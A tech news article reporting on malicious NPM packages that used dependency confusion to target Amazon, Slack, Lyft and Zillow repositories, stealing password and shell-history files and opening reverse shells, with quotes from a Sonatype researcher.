Security researchers discovered that new malicious NPM packages target Amazon, Slack, Zillow, and Lyft code repositories and possibly stealing Linux and Unix password files. Experts also stated that they can open reverse shells back to the hackers.
According to Bleeping Computer's latest report, this newly discovered flaw was first discovered by Alex Birsan, the security researcher who won bug bounties from 35 companies. The expert was able to utilize a new flaw in open-source development tools.
On the other hand, IT Pro reported that the new malicious codes were found in JavaScript repositories. Because of this, hackers and other online attackers can easily acquire sensitive files from Unix and Linux systems.
Sonotype, a cybersecurity firm, said that the NPM packages contain malicious dependency confusion codes and that these malicious packages target the commonly use components companies such as Amazon, Slack, Lyft, and Zillow.
How the new NPM packages attack
The new malicious NPM packages also contain lyft-dataset-sdk, serverless-slack-app, zg-rentals, and amzn. Meanwhile, the dependency managers also use different packages, such as PyPI, RubyGems, and NPM, on the public repo rather than the company's internal packages when building the application.
Security researchers also explained that the new dependency confusion flaw allows different online attackers and cybercriminals to inject their own malicious code into an internal application in the supply-chain attack.
"I was starting to wonder when we were going to see a malicious actor take advantage of the current situation. Finally, we've spotted one," said Juan Aguirre, a Sonatype security researcher, via Bleeping Computer.
"There is no scenario I can imagine where I'm going to submit a PoC for a bug bounty program that actually harms the organization. Taking their /etc/shadow file is definitely harmful," he added.
Malicious NPM package's main target
Security experts said that the new malicious NPM packages' main packages are the companies' Linux profiles ".bash_history" files. Once the hackers acquire this data, they will send it to a remote host under their control. Cybercriminals are currently targeting it since it contains a list of all the commands you typed in the shell, including passwords passed as arguments or texts. You can click here for more info.
For more news updates about new malicious codes used by different online attackers, always keep your tabs open here at TechTimes.
Related Article: Hackers Use 'Gootloader' Along with SEO Tactics to Deploy Malware on Websites, Debuting 'Deoptimization'
This article is owned by TechTimes.
Written by: Giuliano de Leon.